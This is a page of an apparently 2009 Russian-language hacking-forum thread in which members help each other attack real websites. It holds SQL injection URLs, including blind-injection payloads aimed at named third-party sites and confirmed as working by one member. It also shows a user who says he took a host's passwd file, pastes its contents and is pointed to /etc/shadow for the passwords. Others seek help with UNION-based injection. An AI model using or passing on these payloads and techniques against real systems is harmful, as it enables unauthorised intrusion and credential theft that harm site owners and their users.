ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
 
Страница 867 из 1393 « Первая < 367767817857 863 864 865 866 867 868 869 870 871 8779179671367 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #8661  
Старый 25.08.2009, 12:07
nemaniak
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919

Репутация: 229
По умолчанию
Цитата:
Сообщение от [x60]unu  
можно т.к времени крутить сейчас нет скину просто слепую
http://www.royalgroup.it/ita/offerte_speciali.htm?id_prodotto_sel=64/**/aNd/**/substring(version(),1,1)=5--&id_albergo=1179

Попробуй покрутить blind sql т.к стоит некая фильтрация запроса я так понял что union+select
ничего не происходит, перебрасывает лишь на verticalbooking.com, причем при любых значениях...
 

  #8662  
Старый 25.08.2009, 13:15
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
Отправить сообщение для ILYAtirtir с помощью ICQ
По умолчанию
Цитата:
http://www.royalgroup.it/modulo_eventi_gruppo/6242_Offerta_Speciale_Meeting_a_Napoli.htm?id_sezi one=6394+and+substring(version(),1,1)=5
Вот тут работает,5ая ветка.
 

  #8663  
Старый 25.08.2009, 13:49
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319

Репутация: -16
Отправить сообщение для LokbatanLi с помощью ICQ
По умолчанию
http://www.advantage.am/newsArticle.aspx?id=95'a

a 4to taoe eto?? s nim 4tota zdelat mojno??[I]
 

  #8664  
Старый 25.08.2009, 14:59
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
Отправить сообщение для ILYAtirtir с помощью ICQ
По умолчанию
Это не MSSQL:
Цитата:
Microsoft .NET Framework Version:2.0.50727.3082; ASP.NET Version:2.0.50727.3082
 

  #8665  
Старый 25.08.2009, 15:45
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319

Репутация: -16
Отправить сообщение для LokbatanLi с помощью ICQ
По умолчанию
a 4to mojno zdelat??[I]
 

  #8666  
Старый 25.08.2009, 16:31
Komyak
Участник форума
Регистрация: 15.01.2009
Сообщений: 158
Провел на форуме:
469704

Репутация: 26
По умолчанию
Проблема глупая, но ещё не сталкивался. Стянул с хоста файл- "passwd" соответственно в нём логины такого вида

Цитата:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
test:x:0:0:test:/root:/bin/bash
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
И перечисляются все пользователи. А теперь глупый вопрос- пароли только подбирать или они на хосте где-то валяются?
 

  #8667  
Старый 25.08.2009, 16:49
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468

Репутация: 1224


Отправить сообщение для it's my с помощью ICQ
По умолчанию
Цитата:
Сообщение от Komyak  
Проблема глупая, но ещё не сталкивался. Стянул с хоста файл- "passwd" соответственно в нём логины такого вида



И перечисляются все пользователи. А теперь глупый вопрос- пароли только подбирать или они на хосте где-то валяются?
/etc/shadow
 

  #8668  
Старый 25.08.2009, 18:26
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию
Цитата:
Сообщение от it's my  
/etc/shadow
только если ты не руут то врятли получиш к ним доступ
 

  #8669  
Старый 25.08.2009, 18:30
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468

Репутация: 1224


Отправить сообщение для it's my с помощью ICQ
По умолчанию
Цитата:
Сообщение от HAXTA4OK  
только если ты не руут то врятли получиш к ним доступ
на вопрос ответил, и ладно.
 

  #8670  
Старый 26.08.2009, 13:57
bleeep
Новичок
Регистрация: 01.02.2009
Сообщений: 5
Провел на форуме:
41189

Репутация: 0
По умолчанию
Помогите разобраться, пытаюсь провести инъекцию но не могу определить количество полей сделал запрос вот такой www.sait.ru/profile.php?id=-1+union+select+1-- выдал вот такую ошибку
Цитата:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '.`st_id` = `ff_users`.`st_id` AND `ff_status`.`lng_id` = 1' at line 55 file:/var/www/site.ru/profile.php line:186
Пытался перебирать поля дошел до 30 и все равно тоже самое((((Help me((
 
 
Страница 867 из 1393 « Первая < 367767817857 863 864 865 866 867 868 869 870 871 8779179671367 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ